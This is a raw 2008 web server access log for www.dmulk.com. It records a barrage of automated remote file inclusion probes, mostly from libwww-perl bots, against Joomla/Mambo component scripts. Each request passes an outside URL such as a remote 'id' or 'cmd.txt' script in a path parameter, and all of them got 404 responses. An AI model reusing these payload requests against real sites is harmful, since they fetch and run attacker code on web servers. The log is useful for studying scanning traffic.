195.234.108.168 - - [19/Feb/2008:05:42:51 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:42:51 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:42:57 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:25 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:31 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:32 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:32 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [19/Feb/2008:05:43:35 -0800] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.piesse.org/koma/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [19/Feb/2008:05:43:35 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.piesse.org/koma/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:37 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:37 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:37 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:37 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:37 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:37 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:37 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:37 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:05:43:43 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:05:43:43 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:45 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:45 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:45 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:46 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:49 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:53 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:05:43:54 -0800] "GET //appserv/errors.php?error=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:05:43:54 -0800] "GET /logs//appserv/errors.php?error=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:05:43:54 -0800] "GET //appserv/errors.php?error=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:05:43:54 -0800] "GET /logs//appserv/errors.php?error=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:05:43:54 -0800] "GET //appserv/errors.php?error=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:05:43:55 -0800] "GET /logs//appserv/errors.php?error=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:43:55 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:43:57 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:43:57 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:43:57 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:44:03 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:44:08 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.35.192.135 - - [19/Feb/2008:05:44:11 -0800] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
195.35.192.135 - - [19/Feb/2008:05:44:12 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
195.35.192.135 - - [19/Feb/2008:05:44:12 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:05:44:24 -0800] "GET /logs/access.log/index.php?sourcedir=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:05:44:25 -0800] "GET /index.php?sourcedir=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:05:44:25 -0800] "GET /logs/index.php?sourcedir=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:44:28 -0800] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:44:29 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:44:29 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:44:32 -0800] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:44:32 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:44:33 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:44:34 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:44:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:44:46 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:44:46 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:44:46 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:44:51 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:44:51 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:05:44:52 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:05:44:52 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:44:53 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
158.36.103.2 - - [19/Feb/2008:05:44:57 -0800] "GET //components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
158.36.103.2 - - [19/Feb/2008:05:44:58 -0800] "GET //components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cnim.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
158.36.103.2 - - [19/Feb/2008:05:45:00 -0800] "GET /logs//components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
158.36.103.2 - - [19/Feb/2008:05:45:01 -0800] "GET /logs//components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cnim.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
209.216.213.115 - - [19/Feb/2008:05:45:01 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [19/Feb/2008:05:45:02 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [19/Feb/2008:05:45:02 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:45:09 -0800] "GET /logs/access_080106.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:45:10 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:45:10 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:45:14 -0800] "GET /logs/access_080106.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.146.33.210 - - [19/Feb/2008:05:45:16 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:45:16 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:45:16 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.146.33.210 - - [19/Feb/2008:05:45:16 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
85.14.221.150 - - [19/Feb/2008:05:45:17 -0800] "GET /logs/access_080117.log/werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.104.223.2 - - [19/Feb/2008:05:45:17 -0800] "GET /logs/access_080117.log/werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:45:17 -0800] "GET /logs/access_080106.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.104.223.2 - - [19/Feb/2008:05:45:17 -0800] "GET /werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.14.221.150 - - [19/Feb/2008:05:45:17 -0800] "GET /werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:45:17 -0800] "GET /logs/access_080106.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.216.213.115 - - [19/Feb/2008:05:45:17 -0800] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.104.223.2 - - [19/Feb/2008:05:45:17 -0800] "GET /logs/werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.14.221.150 - - [19/Feb/2008:05:45:18 -0800] "GET /logs/werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:45:22 -0800] "GET /logs/access_080106.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:05:45:41 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:45:42 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:45:42 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.35.192.135 - - [19/Feb/2008:05:45:59 -0800] "GET /logs/access_080117.log/werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
195.35.192.135 - - [19/Feb/2008:05:45:59 -0800] "GET /werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
195.35.192.135 - - [19/Feb/2008:05:46:00 -0800] "GET /logs/werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
128.196.27.145 - - [19/Feb/2008:05:46:04 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
128.196.27.145 - - [19/Feb/2008:05:46:04 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:46:15 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:46:15 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:46:16 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.35.192.135 - - [19/Feb/2008:05:46:21 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:46:23 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [19/Feb/2008:05:46:25 -0800] "GET /logs/access_080117.log/werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [19/Feb/2008:05:46:26 -0800] "GET /werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [19/Feb/2008:05:46:26 -0800] "GET /logs/werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:05:46:36 -0800] "GET /logs/access_080122.log/index.php?sourcedir=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.252 - - [19/Feb/2008:05:47:01 -0800] "GET /logs/access_080121.log//components/com_minibb.php?absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [19/Feb/2008:05:47:01 -0800] "GET //components/com_minibb.php?absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [19/Feb/2008:05:47:01 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:47:28 -0800] "GET /logs/access_080104.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:47:29 -0800] "GET /logs/access_080104.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
